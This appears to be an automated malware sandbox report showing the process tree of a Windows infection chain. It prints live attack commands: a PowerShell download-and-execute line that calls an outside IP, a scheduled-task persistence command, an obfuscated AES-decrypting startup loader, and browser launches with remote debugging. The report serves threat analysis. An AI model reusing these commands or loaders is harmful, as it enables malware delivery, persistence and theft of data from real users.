C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "yjwdrmaHaWu" /tr "mshta \"C:\Temp\yokj3B92d.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2624
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\yokj3B92d.hta"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4028
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086800001\9f63f4acb4.exe"C:\Users\Admin\AppData\Local\Temp\1086800001\9f63f4acb4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\1086801001\9ce8b15e02.exe"C:\Users\Admin\AppData\Local\Temp\1086801001\9ce8b15e02.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:712
-
-
C:\Users\Admin\AppData\Local\Temp\1086802001\e11c49ce9a.exe"C:\Users\Admin\AppData\Local\Temp\1086802001\e11c49ce9a.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\1086803001\7bf33bfbf1.exe"C:\Users\Admin\AppData\Local\Temp\1086803001\7bf33bfbf1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4668 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:5668
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086804001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1086804001\C3hYpvm.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4384
-
-
C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086805001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 9524⤵
- Program crash
PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086806001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086806001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\1086807001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086807001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086808041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:3812
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086809001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086809001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:920 -
C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1086810001\7aencsM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1632 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4468 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff93cdecc40,0x7ff93cdecc4c,0x7ff93cdecc586⤵PID:412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:26⤵PID:1892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:36⤵PID:688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2252 /prefetch:86⤵PID:3772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3180 /prefetch:16⤵
- Uses browser remote debugging
PID:3248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:16⤵
- Uses browser remote debugging
PID:4376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4484,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:86⤵PID:2028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4328,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4672 /prefetch:16⤵
- Uses browser remote debugging
PID:4576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4876,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4872 /prefetch:86⤵PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:86⤵PID:3448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:86⤵PID:5452
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6096 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff94d5d46f8,0x7ff94d5d4708,0x7ff94d5d47186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:26⤵PID:5472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:36⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:86⤵PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:16⤵
- Uses browser remote debugging
PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:16⤵
- Uses browser remote debugging
PID:5264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:16⤵
- Uses browser remote debugging
PID:744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:16⤵
- Uses browser remote debugging
PID:4888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\w4eua" & exit5⤵
- System Location Discovery: System Language Discovery
PID:5112 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- Delays execution with timeout.exe
PID:2708
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 9564⤵
- Program crash
PID:3084
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086811001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086811001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:900
-
-
C:\Users\Admin\AppData\Local\Temp\1086812001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086812001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5240
-
-
C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5660 -
C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 9684⤵
- Program crash
PID:5764
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086814001\67c3b98f4d.exe"C:\Users\Admin\AppData\Local\Temp\1086814001\67c3b98f4d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6080 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086815001\c55a0e6e0b.exe"C:\Users\Admin\AppData\Local\Temp\1086815001\c55a0e6e0b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2780 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086816001\2a2c7885e3.exe"C:\Users\Admin\AppData\Local\Temp\1086816001\2a2c7885e3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4668
-
-
C:\Users\Admin\AppData\Local\Temp\1086817001\207737d668.exe"C:\Users\Admin\AppData\Local\Temp\1086817001\207737d668.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\1086818001\c8ec90ad9b.exe"C:\Users\Admin\AppData\Local\Temp\1086818001\c8ec90ad9b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 15164⤵
- Program crash
PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086819001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086819001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5880 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:3688 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 8286⤵
- Program crash
PID:3788
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
PID:5288
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
PID:5312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 9646⤵
- Program crash
PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:6808
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 9686⤵
- Program crash
PID:392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008080101\9cf6487121.exe"C:\Users\Admin\AppData\Local\Temp\10008080101\9cf6487121.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:3840 -
